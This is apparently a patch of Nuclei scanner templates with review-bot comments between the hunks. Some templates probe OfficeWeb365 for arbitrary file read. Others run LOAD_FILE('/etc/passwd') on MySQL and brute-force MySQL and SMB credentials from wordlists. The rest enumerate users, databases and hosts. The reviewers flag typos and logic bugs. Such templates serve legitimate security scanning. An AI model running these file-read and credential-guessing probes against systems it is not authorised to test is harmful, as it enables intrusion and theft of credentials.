internal: true + name: filepath + group: 1 + regex: + - '"srcUrl":"\/([a-z/0-9_.]+)"' diff --git a/http/vulnerabilities/other/office365-indexs-fileread.yaml b/http/vulnerabilities/other/office365-indexs-fileread.yaml new file mode 100644 index 0000000000..ebb3013d26 --- /dev/null 
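Review bot: The `instrusive` tag is misspelled and will not match the `intrusive` filter users rely on to exclude state-changing templates; fix to `tags: idoc,rce,intrusive,file-upload`. The template has neither `description` nor `reference`, unlike the rest of this patch; at minimum a description of what the `/html/2word?url=` request does and why `{{md5(file)}}.docx` in the response proves it is needed. The word matcher uses `part: response`, which is unusual in this patch (others use `body`); confirm that is intended.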
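Review bot: The `filepath` extractor is marked `internal: true` and named, but no later request consumes it, so it is dead configuration; either drop it or add a comment explaining what it is reserved for. The request targets `file:///C:/windows/win.ini`, so the check can only fire on Windows hosts, which belongs in a `description` (the template has none, nor a `reference`). The hard-coded `token=testtoken` deserves a one-line comment on whether the endpoint accepts arbitrary token values, since that assumption is what the whole check rests on.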
+++ b/http/vulnerabilities/other/office365-indexs-fileread.yaml @@ -0,0 +1,36 @@ +id: office365-indexs-fileread + +info: + name: OfficeWeb365 Indexs Interface - Arbitary File Read + author: DhiyaneshDK + severity: high + description: | + There is any file reading in the officeWeb365 Indexs interface. + reference: + - https://github.com/wy876/POC/blob/main/OfficeWeb365_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + shodan-query: "OfficeWeb365" + tags: officeweb365,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "for 16-bit app support" + + - type: word + part: body + words: + - "image/png" + + - type: status + status: + - 200 diff --git a/javascript/audit/mysql/mysql-load-file.yaml b/javascript/audit/mysql/mysql-load-file.yaml new file mode 100644 index 0000000000..5fc8f03f36 --- /dev/null +++ b/javascript/audit/mysql/mysql-load-file.yaml 
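Review bot: `name` has a typo (`Arbitary` should be `Arbitrary`) and `description` reads "There is any file reading", which should be `The OfficeWeb365 Indexs interface allows arbitrary file read`. The `imgs=` value is an opaque encoded token with no explanation; the `for 16-bit app support` matcher suggests it resolves to a Windows `win.ini` path, and if so a comment above the path such as `# imgs: encoded path of the probe file, see reference` would tell a reader what is being requested. The two body word matchers can be collapsed into one matcher with both words and `condition: and`, matching the style used elsewhere in this patch.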
@@ -0,0 +1,51 @@ +id: mysql-load-file +info: + name: MySQL LOAD_FILE - Enable + author: pussycat0x + severity: high + description: | + The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities. + reference: + - https://nmap.org/nsedoc/scripts/mysql-databases.html + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,network,audit,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + to_json(response); + + args: + Host: "{{Host}}" + Port: "3306" + Query: SELECT LOAD_FILE('/etc/passwd') + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - success == true + + - type: word + words: + - "root:x:" + + extractors: + - type: json + part: response + json: + - .Rows[] diff --git a/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml new file mode 100644 index 0000000000..aa3ee91fee --- /dev/null +++ b/javascript/enumeration/smb/pop3/pop3-capabilities-enum.yaml 
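Review bot: The `reference` points at nmap's `mysql-databases` script page, which documents database enumeration rather than `LOAD_FILE` or `FILE`-privilege checks, so it does not support this template; MySQL's documentation for `LOAD_FILE` and the `secure_file_priv` setting would be the relevant citation. `name: MySQL LOAD_FILE - Enable` should read `Enabled`. This template lands in `javascript/audit/mysql/` while the same patch creates `javascript/mysql/` and `javascript/network/mysql/`; three directories for one protocol will confuse path-based selection, and `metadata` has no `max-request`, which for a wordlist-driven `pitchfork` attack should at least be stated as depending on the wordlist sizes.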
@@ -0,0 +1,40 @@ +id: pop3-capabilities-enum + +info: + name: POP3 Capabilities - Enumeration + author: pussycat0x + severity: info + description: | + POP3 capabilities are defined in RFC 2449. The CAPA command allows a client to ask a server what commands it supports and possibly any site-specific policy. Besides the list of supported commands, the IMPLEMENTATION string giving the server version may be available. + reference: + - https://nmap.org/nsedoc/scripts/pop3-capabilities.html + metadata: + max-request: 1 + shodan-query: "port:110" + verified: true + tags: js,network,pop3,enum + +javascript: + - code: | + let data = "CAPA\r\n" + let c = require("nuclei/net"); + let conn = c.Open('tcp', `${Host}:${Port}`); + conn.Send(data); + let result = conn.RecvString(); + let cleanedData = result.replace(/\+OK Dovecot ready\.\r\n\+OK|\r\n|\s/g, " "); + Export(cleanedData) + + args: + Host: "{{Host}}" + Port: 110 + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: dsl + name: + dsl: + - response diff --git a/javascript/enumeration/smb/rsync/rsync-version.yaml b/javascript/enumeration/smb/rsync/rsync-version.yaml new file mode 100644 index 0000000000..e986a8298d --- /dev/null +++ b/javascript/enumeration/smb/rsync/rsync-version.yaml @@ -0,0 +1,29 @@ +id: rsync-version + +info: + name: Rsync Version - Detect + author: DhiyaneshDK + severity: info + description: | + Identify the Version of the Rsync Protocol + metadata: + verified: true + max-request: 1 + shodan-query: port:"873" + tags: js,network,rsync,enum + +javascript: + - code: | + let m = require('nuclei/rsync'); + let c = m.RsyncClient(); + let response = c.IsRsync(Host,Port); + to_json(response); + + args: + Host: "{{Host}}" + Port: "873" + + extractors: + - type: json + json: + - .Banner diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml new file mode 100644 index 0000000000..3a33b9ab79 --- /dev/null 
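Review bot: The `dsl` extractor has an empty `name:` key, which YAML parses as `null`; give it a name (`name: capabilities`) or remove the key. The file lives under `javascript/enumeration/smb/pop3/`, but POP3 has nothing to do with SMB; the same applies to `smb/rsync/rsync-version.yaml` in this patch, so both should move to `javascript/enumeration/pop3/` and `javascript/enumeration/rsync/`. The cleanup regex strips a Dovecot-specific greeting (`+OK Dovecot ready.`), so other servers' banners pass through into the export untouched; a comment stating that, or a generic prefix strip such as `/^\+OK[^\r\n]*\r\n/`, would be clearer. `Port: 110` is a bare integer while the other templates quote ports as strings.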
+++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -0,0 +1,46 @@ +id: smb-default-creds + +info: + name: SMB Default Credential - Brutforcing + author: pussycat0x + severity: high + description: | + Attempts to guess username/password combinations over SMB. + reference: + - https://nmap.org/nsedoc/scripts/smb-brute.html + metadata: + verified: true + shodan-query: "port:445" + tags: js,network,smb,enum,default + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ListShares(Host, Port, User, Pass); + response; + + args: + Host: "{{Host}}" + Port: "445" + User: "{{usernames}}" + Pass: "{{passwords}}" + + attack: clusterbomb + payloads: + usernames: + - 'admin' + - 'administrator' + - 'guest' + passwords: + - 'admin' + - 'password' + - 'guest' + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'response != "[]"' + - 'success == true' + condition: and diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml new file mode 100644 index 0000000000..b5c21ace5a --- /dev/null +++ b/javascript/enumeration/smb/smb-enum-domains.yaml 
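Review bot: `name` misspells `Brutforcing`; `SMB Default Credential - Bruteforce` (or `- Default Login`) matches the naming the ispconfig template in this patch uses, and the tag list should use the same `default-login` tag rather than bare `default`. `metadata` lacks `max-request`; with `attack: clusterbomb` over three usernames and three passwords that is `max-request: 9`. The matcher `response != "[]"` compares the value returned by `ListShares` to a string literal, so it depends on how nuclei stringifies that array; ending the script with `to_json(response);` as the other SMB templates do makes the comparison explicit. This file uses `var` while the rest of the patch uses `let`; minor, but consistent style helps.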
@@ -0,0 +1,41 @@ +id: smb-enum-domains + +info: + name: SMB - Enum Domains + author: DhiyaneshDK + severity: info + description: | + SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities. + reference: + - https://nmap.org/nsedoc/scripts/smb-enum-domains.html + metadata: + verified: true + max-request: 1 + shodan-query: port:445 + tags: js,network,smb,enum + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ListSMBv2Metadata(Host, Port); + to_json(response); + + args: + Host: "{{Host}}" + Port: "445" + matchers: + - type: dsl + dsl: + - "len(DNSDomainName) != 0" + + extractors: + - type: json + internal: true + name: DNSDomainName + json: + - '.DNSDomainName' + + - type: json + json: + - '"DomainName: "+ .DNSDomainName ' diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml new file mode 100644 index 0000000000..180b7cdd54 --- /dev/null +++ b/javascript/enumeration/smb/smb-os-detect.yaml 
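Review bot: The `description` talks about reconnaissance in general rather than what this template does; `Extracts the DNS domain name from the SMBv2 metadata returned by ListSMBv2Metadata` tells a reader what the output is. The `dsl` matcher `len(DNSDomainName) != 0` references the internal extractor's name, so it relies on extractors being evaluated before matchers for the same response; confirm nuclei guarantees that ordering, otherwise the matcher never sees the value. The JQ expression `'"DomainName: "+ .DNSDomainName '` has a stray trailing space before the closing quote; harmless for jq but untidy.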
@@ -0,0 +1,158 @@ +id: smb-os-detect + +info: + name: SMB Operating System - Detect + author: pussycat0x + severity: info + description: | + Detect Operating System + reference: + - https://nmap.org/nsedoc/scripts/smb-os-discovery.html + metadata: + shodan-query: "port:445" + tags: js,network,smb,enum,os + +javascript: + - code: | + var m = require("nuclei/smb"); + var c = m.SMBClient(); + var response = c.ListSMBv2Metadata(Host, Port); + if (response.OSVersion === "6.3.9600") { + osInfo = "Windows 8.1"; + } else if (response.OSVersion === "3.10.511") { + osInfo = "Windows NT 3.1"; + } else if (response.OSVersion === "3.50.807") { + osInfo = "Windows NT 3.5"; + } else if (response.OSVersion === "3.10.528") { + osInfo = "Windows NT 3.1, Service Pack 3"; + } else if (response.OSVersion === "3.51.1057") { + osInfo = "Windows NT 3.51"; + } else if (response.OSVersion === "4.00.950") { + osInfo = "Windows 95"; + } else if (response.OSVersion === "4.00.950A") { + osInfo = "Windows 95 OEM Service Release 1"; + } else if (response.OSVersion === "4.00.950B") { + osInfo = "Windows 95 OEM Service Release 2"; + } else if (response.OSVersion === "4.0.1381") { + osInfo = "Windows NT 4.0"; + } else if (response.OSVersion === "4.00.950B") { + osInfo = "Windows 95 OEM Service Release 2.1"; + } else if (response.OSVersion === "4.00.950C") { + osInfo = "OEM Service Release 2.5"; + } else if (response.OSVersion === "4.10.1998") { + osInfo = "Windows 98"; + } else if (response.OSVersion === "4.10.2222") { + osInfo = "Windows 98 Second Edition (SE)"; + } else if (response.OSVersion === "5.0.2195") { + osInfo = "Windows 2000"; + } else if (response.OSVersion === "4.90.3000") { + osInfo = "Windows Me"; + } else if (response.OSVersion === "5.1.2600") { + osInfo = "Windows XP"; + } else if (response.OSVersion === "5.1.2600.1105-1106") { + osInfo = "Windows XP, Service Pack 1"; + } else if (response.OSVersion === "5.2.3790") { + osInfo = "Windows Server 2003"; + } else if (response.OSVersion 
=== "5.1.2600.2180") { + osInfo = "Windows XP, Service Pack 2"; + } else if (response.OSVersion === "5.2.3790.1180") { + osInfo = "Windows Server 2003, Service Pack 1"; + } else if (response.OSVersion === "5.2.3790") { + osInfo = "Windows Server 2003 R2"; + } else if (response.OSVersion === "6.0.6000") { + osInfo = "Windows Vista"; + } else if (response.OSVersion === "5.2.3790") { + osInfo = "Windows Server 2003, Service Pack 2"; + } else if (response.OSVersion === "5.2.4500") { + osInfo = "Windows Home Server"; + } else if (response.OSVersion === "6.0.6001") { + osInfo = "Windows Vista, Service Pack 1"; + } else if (response.OSVersion === "6.0.6001") { + osInfo = "Windows Server 2008"; + } else if (response.OSVersion === "5.1.2600") { + osInfo = "Windows XP, Service Pack 3"; + } else if (response.OSVersion === "6.0.6002") { + osInfo = "Windows Vista, Service Pack 2"; + } else if (response.OSVersion === "6.0.6002") { + osInfo = "Windows Server 2008, Service Pack 2"; + } else if (response.OSVersion === "6.1.7600") { + osInfo = "Windows 7"; + } else if (response.OSVersion === "6.1.7600") { + osInfo = "Windows Server 2008 R2"; + } else if (response.OSVersion === "6.1.7601") { + osInfo = "Windows 7, Service Pack 1"; + } else if (response.OSVersion === "6.1.7601") { + osInfo = "Windows Server 2008 R2, Service Pack "; + } else if (response.OSVersion === "6.1.8400") { + osInfo = "Windows Home Server 2011"; + } else if (response.OSVersion === "6.2.9200") { + osInfo = "Windows Server 2012"; + } else if (response.OSVersion === "6.2.9200") { + osInfo = "Windows 8"; + } else if (response.OSVersion === "6.3.9600") { + osInfo = "Windows 8.1"; + } else if (response.OSVersion === "6.3.9600") { + osInfo = "Windows Server 2012 R2"; + } else if (response.OSVersion === "10.0.10240") { + osInfo = "Windows 10, Version 1507"; + } else if (response.OSVersion === "10.0.10586") { + osInfo = "Windows 10, Version 1511"; + } else if (response.OSVersion === "10.0.14393") { + osInfo = "Windows 
10, Version 1607"; + } else if (response.OSVersion === "10.0.14393") { + osInfo = "Windows Server 2016, Version 1607"; + } else if (response.OSVersion === "10.0.15063") { + osInfo = "Windows 10, Version 1703"; + } else if (response.OSVersion === "10.0.16299") { + osInfo = "Windows 10, Version 1709"; + } else if (response.OSVersion === "10.0.17134") { + osInfo = "Windows 10, Version 1803"; + } else if (response.OSVersion === "10.0.17763") { + osInfo = "Windows Server 2019, Version 1809"; + } else if (response.OSVersion === "10.0.17763") { + osInfo = "Windows 10, Version 1809"; + } else if (response.OSVersion === "6.0.6003") { + osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887"; + } else if (response.OSVersion === "10.0.18362") { + osInfo = "Windows 10, Version 1903"; + } else if (response.OSVersion === "10.0.18363") { + osInfo = "Windows 10, Version 1909"; + } else if (response.OSVersion === "10.0.18363") { + osInfo = "Windows Server, Version 1909"; + } else if (response.OSVersion === "10.0.19041") { + osInfo = "Windows 10, Version 2004"; + } else if (response.OSVersion === "10.0.19041") { + osInfo = "Windows Server, Version 2004"; + } else if (response.OSVersion === "10.0.19042") { + osInfo = "Windows 10, Version 20H2"; + } else if (response.OSVersion === "10.0.19042") { + osInfo = "Windows Server, Version 20H2"; + } else if (response.OSVersion === "10.0.19043") { + osInfo = "Windows 10, Version 21H1"; + } else if (response.OSVersion === "10.0.20348") { + osInfo = "Windows Server 2022, Version 21H2"; + } else if (response.OSVersion === "10.0.22000") { + osInfo = "Windows 11, Version 21H2"; + } else if (response.OSVersion === "10.0.19044") { + osInfo = "Windows 10, Version 21H2"; + } else if (response.OSVersion === "10.0.22621") { + osInfo = "Windows 11, Version 22H2"; + } else if (response.OSVersion === "10.0.19045") { + osInfo = "Windows 10, Version 22H2"; + } else if (response.OSVersion === "10.0.25398") { + osInfo = "Windows Server, Version 23H2"; 
+ } else if (response.OSVersion === "10.0.22631") { + osInfo = "Windows 11, Version 23H2"; + } else if (response.OSVersion !== "0") { + osInfo = response.OSVersion; + } + osInfo; + + args: + Host: "{{Host}}" + Port: "445" + + extractors: + - type: dsl + dsl: + - response \ No newline at end of file diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml new file mode 100644 index 0000000000..a7ec579271 --- /dev/null +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -0,0 +1,28 @@ +id: smb-version-detect + +info: + name: SMB Version - Detection + author: pussycat0x + severity: info + description: | + SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities. + metadata: + shodan-query: "port:445" + tags: js,network,smb,enum + +javascript: + - code: | + let m = require("nuclei/smb"); + let c = m.SMBClient(); + let response = c.ConnectSMBInfoMode(Host, Port); + to_json(response); + + args: + Host: "{{Host}}" + Port: "445" + + extractors: + - type: json + name: smb-version + json: + - '.Version.VerString' diff --git a/javascript/mysql/mysql-db-enum.yaml b/javascript/mysql/mysql-db-enum.yaml new file mode 100644 index 0000000000..909ef0b518 --- /dev/null +++ b/javascript/mysql/mysql-db-enum.yaml 
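Review bot: Several `OSVersion` values appear in more than one `else if` branch, so every later branch for the same value is dead: `6.3.9600` (Windows 8.1 first, Server 2012 R2 never reached), `5.2.3790` three times, `4.00.950B`, `6.0.6001`, `6.0.6002`, `6.1.7600`, `6.1.7601`, `6.2.9200`, `10.0.14393`, `10.0.17763`, `10.0.18363`, `10.0.19041`, `10.0.19042`; a build number is shared by client and server SKUs, so the chain cannot pick one and should label both. `osInfo` is never declared, so when `response.OSVersion` is `"0"` no branch assigns it and the final `osInfo;` throws a ReferenceError instead of yielding an empty result. The string `"Windows Server 2008 R2, Service Pack "` is truncated, and the template has no `matchers`, so it reports every reachable host even with an empty value. A lookup object with one entry per build, an explicit `var osInfo = ""` and a guard on a missing response replaces the chain; a sketch follows.
```yaml
  - code: |
      var m = require("nuclei/smb");
      var c = m.SMBClient();
      var response = c.ListSMBv2Metadata(Host, Port);
      // One label per build: a build number is shared by client and server
      // SKUs, so the label names every product it can stand for.
      var builds = {
        "5.2.3790": "Windows Server 2003 / Server 2003 R2 / Server 2003 SP2",
        "6.0.6001": "Windows Vista SP1 / Windows Server 2008",
        "6.1.7600": "Windows 7 / Windows Server 2008 R2",
        "6.3.9600": "Windows 8.1 / Windows Server 2012 R2",
        "10.0.14393": "Windows 10, Version 1607 / Windows Server 2016",
        "10.0.17763": "Windows 10, Version 1809 / Windows Server 2019"
        // … remaining builds from the original chain, one entry each …
      };
      var osInfo = "";
      if (response && response.OSVersion && response.OSVersion !== "0") {
        osInfo = builds[response.OSVersion] || response.OSVersion;
      }
      osInfo;
      # … unchanged: args …
  matchers:
    - type: dsl
      dsl:
        - 'response != ""'
```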
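Review bot: This template declares its client with `let` while the other SMB templates in the same commit (`smb-default-creds`, `smb-enum-domains`, `smb-os-detect`) use `var`; the runtime accepts both, but pick one for the series so the scripts read uniformly. The `description` discusses why SMB version detection matters but not what is extracted; stating that the `smb-version` extractor reports `Version.VerString` from `ConnectSMBInfoMode` would be more useful to an operator reading the output. The `verified` and `max-request` metadata present on sibling templates is absent here.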
@@ -0,0 +1,44 @@ +id: mysql-db-enum + +info: + name: MySQL Database - Enumeration + author: pussycat0x + severity: high + metadata: + shodan-query: port:3306 + tags: js,mssql,network,enum,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let result = c.ConnectWithDB(Host,Port,User,Pass,dbName); + result; + + args: + Host: "{{Host}}" + Port: "3306" + dbName: "{{db}}" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + stop-at-first-match: true + + payloads: + db: + - information_schema + - performance_schema + - mysql + + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + + matchers: + - type: dsl + dsl: + - "response == true" + - "success == true" + condition: and diff --git a/javascript/mysql/mysql-default-login.yaml b/javascript/mysql/mysql-default-login.yaml new file mode 100644 index 0000000000..a285e9e135 --- /dev/null +++ b/javascript/mysql/mysql-default-login.yaml @@ -0,0 +1,44 @@ +id: mysql-default-login + +info: + name: MySQL - Default Login + author: DhiyaneshDk,pussycat0x,ritikchaddha + severity: high + description: | + A MySQL service was accessed with easily guessed credentials. + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,default-login,network,fuzz + +javascript: + - pre-condition: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.IsMySQL(Host, Port); + + code: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.Connect(Host,Port,Username,Password) + + args: + Host: "{{Host}}" + Port: "3306" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "response == true" + - "success == true" + condition: and 
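Review bot: `tags: js,mssql,network,enum,fuzz` labels a MySQL template as `mssql`, so `-tags mysql` will not select it and `-tags mssql` will; the same wrong tag is in the `mysql-empty-password` hunk of this patch. The template has no `description`, and like the other wordlist-driven MySQL templates here (`mysql-default-login`, `mysql-show-variables`, `mysql-user-enum`, `mysql-show-databases`) no `max-request` metadata, although the request count is fixed by the bundled `helpers/wordlists` files. A description should say that the check authenticates with the bundled credential lists, so that readers understand `severity: high` as weak credentials rather than as database enumeration.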
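Review bot: The script calls `c.Connect(Host,Port,Username,Password)` but the `args` block defines `User` and `Pass`, so `Username` and `Password` are undefined identifiers at run time and the template can never match; either the call should read `c.Connect(Host,Port,User,Pass)` or the args should be renamed to match. The `pre-condition` and `code` blocks each `require` the module and build a client, which is expected since they are separate scripts, but a short comment saying the pre-condition only gates on `IsMySQL` would help the next reader. Where `stop-at-first-match: true` sits relative to `payloads` is not recoverable from the collapsed diff; if it is indented under `payloads`, as in the `mysql-load-file` fix in PATCH 04, it is parsed as a payload entry rather than a request option.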
diff --git a/javascript/mysql/mysql-show-variables.yaml b/javascript/mysql/mysql-show-variables.yaml new file mode 100644 index 0000000000..778c32ec4a --- /dev/null +++ b/javascript/mysql/mysql-show-variables.yaml @@ -0,0 +1,45 @@ +id: mysql-show-variables + +info: + name: MySQL - Show Variables + author: DhiyaneshDk + severity: high + description: Attempts to show all variables on a MySQL server. + reference: + - https://nmap.org/nsedoc/scripts/mysql-variables.html + metadata: + shodan-query: port:3306 + tags: js,mysql,network,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + log(to_json(response)); + + args: + Host: "{{Host}}" + Port: "3306" + User: "{{usernames}}" + Pass: "{{passwords}}" + Query: "show variables;" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - '.Rows[].Variable_name' diff --git a/javascript/mysql/mysql-user-enum.yaml b/javascript/mysql/mysql-user-enum.yaml new file mode 100644 index 0000000000..4df366eea5 --- /dev/null +++ b/javascript/mysql/mysql-user-enum.yaml 
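Review bot: The extractor `'.Rows[].Variable_name'` assumes `ExecuteQuery` returns rows keyed by column name; that shape is not visible here, so confirm it against the `nuclei/mysql` module before relying on the output. `Query: "show variables;"` is lower-case while `mysql-user-enum` in the same patch writes its SQL upper-case; use one style across the series. As with the other MySQL templates, the `description` should state that the query runs only after a wordlist login succeeds, which is what justifies `severity: high`.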
@@ -0,0 +1,47 @@ +id: mysql-user-enum + +info: + name: MySQL - User Enumeration + author: pussycat0x + severity: high + description: | + Attempts to list all users on a MySQL server. + reference: + - https://nmap.org/nsedoc/scripts/mysql-users.html + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,network,enum,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + to_json(response); + + args: + Host: "{{Host}}" + Port: "3306" + Query: "SELECT DISTINCT user FROM mysql.user;" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - '.Rows[].user' diff --git a/javascript/network/mysql/mysql-empty-password.yaml b/javascript/network/mysql/mysql-empty-password.yaml new file mode 100644 index 0000000000..7c9973ea90 --- /dev/null +++ b/javascript/network/mysql/mysql-empty-password.yaml @@ -0,0 +1,41 @@ +id: mysql-empty-password + +info: + name: MySQL - Empty Password + author: DhiyaneshDk + severity: high + description: | + Checks for MySQL servers with an empty password for root or anonymous. + metadata: + shodan-query: port:3306 + tags: js,mssql,network + +javascript: + - pre-condition: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.IsMySQL(Host, Port); + + code: | + var m = require("nuclei/mysql"); + var c = m.MySQLClient(); + c.Connect(Host,Port,User,Pass) + + args: + Host: "{{Host}}" + Port: "3306" + User: "{{username}}" + Pass: " " + + payloads: + usernames: + - root + - anonymous + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "response == true" + - "success == true" + condition: and 
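Review bot: `Pass: " "` is a single space, not an empty password, so the check does not test what the name and description claim; `Pass: ""` is the intended value. `User: "{{username}}"` references a variable that is never defined, because the payload set is called `usernames`; the arg should read `User: "{{usernames}}"`. The tag list repeats the `mssql` mistake from `mysql-db-enum`, and `max-request: 2` metadata would document the fixed two-entry payload.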
diff --git a/javascript/network/mysql/mysql-show-databases.yaml b/javascript/network/mysql/mysql-show-databases.yaml new file mode 100644 index 0000000000..6df95d25fd --- /dev/null +++ b/javascript/network/mysql/mysql-show-databases.yaml @@ -0,0 +1,45 @@ +id: mysql-show-databases + +info: + name: MySQL - Show Databases + author: DhiyaneshDk + severity: high + reference: + - https://nmap.org/nsedoc/scripts/mysql-databases.html + metadata: + shodan-query: port:3306 + verified: true + tags: js,mysql,network,fuzz + +javascript: + - code: | + let m = require('nuclei/mysql'); + let c = m.MySQLClient(); + let response = c.ExecuteQuery(Host,Port,User,Pass,Query); + to_json(response); + + args: + Host: "{{Host}}" + Port: "3306" + Query: "show databases;" + User: "{{usernames}}" + Pass: "{{passwords}}" + + threads: 10 + attack: pitchfork + + payloads: + usernames: helpers/wordlists/mysql-users.txt + passwords: helpers/wordlists/mysql-passwords.txt + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - "success == true" + + extractors: + - type: json + part: response + json: + - .Rows[] | .Database diff --git a/javascript/network/redis/redis-info.yaml b/javascript/network/redis/redis-info.yaml new file mode 100644 index 0000000000..4a228a1a74 --- /dev/null +++ b/javascript/network/redis/redis-info.yaml 
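Review bot: The jq expression `.Rows[] | .Database` is the only unquoted extractor in this series; YAML accepts it as a plain scalar, but a leading `.` and an embedded `|` are exactly the characters that break when the expression is edited, and the sibling `mysql-user-enum` quotes its `'.Rows[].user'`. Write it as `- '.Rows[] | .Database'`. The template also has no `description` and no `max-request` metadata.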
@@ -0,0 +1,39 @@ +id: redis-info + +info: + name: Redis Info - Detect + author: DhiyaneshDK + severity: info + description: | + Retrieves information (such as version number and architecture) from a Redis key-value store. + reference: + - https://nmap.org/nsedoc/scripts/redis-info.html + metadata: + max-request: 1 + shodan-query: product:"redis" + tags: js,redis,network + +javascript: + - code: | + const redis = require('nuclei/redis'); + const info = redis.GetServerInfo(Host,Port); + Export(info); + + args: + Host: "{{Host}}" + Port: "6379" + + extractors: + - type: regex + part: response + regex: + - redis_version:(\d+\.\d+\.\d+) + - os:(.*?)\\r\\n + - arch_bits:(\d+)\s+bits + - process_id:(\d+) + - used_cpu_sys:(\d+\.\d+) + - used_cpu_user:(\d+\.\d+) + - connected_clients:(\d+) + - connected_slaves:(\d+) + - used_memory_human:(\d+\.\d+[KMGTPEZY]?) + - role:(\w+) diff --git a/javascript/network/redis/redis-require-auth.yaml b/javascript/network/redis/redis-require-auth.yaml new file mode 100644 index 0000000000..d87e34fc94 --- /dev/null +++ b/javascript/network/redis/redis-require-auth.yaml @@ -0,0 +1,29 @@ +id: redis-require-auth + +info: + name: Redis Require Authentication - Detect + author: DhiyaneshDK + severity: info + description: | + IsAuthenticated checks if the redis server requires authentication + reference: + - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated + metadata: + max-request: 1 + shodan-query: product:"redis" + tags: js,redis,network + +javascript: + - code: | + const redis = require('nuclei/redis'); + const isAuthenticated = redis.IsAuthenticated(Host,Port); + Export(isAuthenticated); + + args: + Host: "{{Host}}" + Port: "6379" + + matchers: + - type: dsl + dsl: + - "success == true" diff --git a/javascript/network/smb/smb2-server-time.yaml b/javascript/network/smb/smb2-server-time.yaml new file mode 100644 index 0000000000..3cb9148b8d --- /dev/null 
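Review bot: The regex `os:(.*?)\\r\\n` is a plain YAML scalar, so the pattern handed to the engine contains `\\r\\n`, which matches a literal backslash followed by `r`, not a CRLF; it only captures the `os:` line if `Export(info)` renders the INFO text with escaped line breaks, which is not visible here. If the response is the raw INFO output the pattern should be `os:(.*?)\r\n`, or simply `os:([^\r\n]+)`; confirm against a real response. The other patterns carry no such escapes and read fine.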
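Review bot: The only matcher is `success == true`, which reports that the script ran, not what `IsAuthenticated` returned, so every reachable Redis instance matches whether or not it requires authentication and the template name becomes misleading. The exported boolean should be part of the match, for example `- "response == true"` as the MySQL templates in this patch do, although the exact variable name that `Export(isAuthenticated)` exposes to the DSL should be confirmed. The `description` is the module doc sentence copied verbatim (`IsAuthenticated checks if ...`); describe the template's finding instead.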
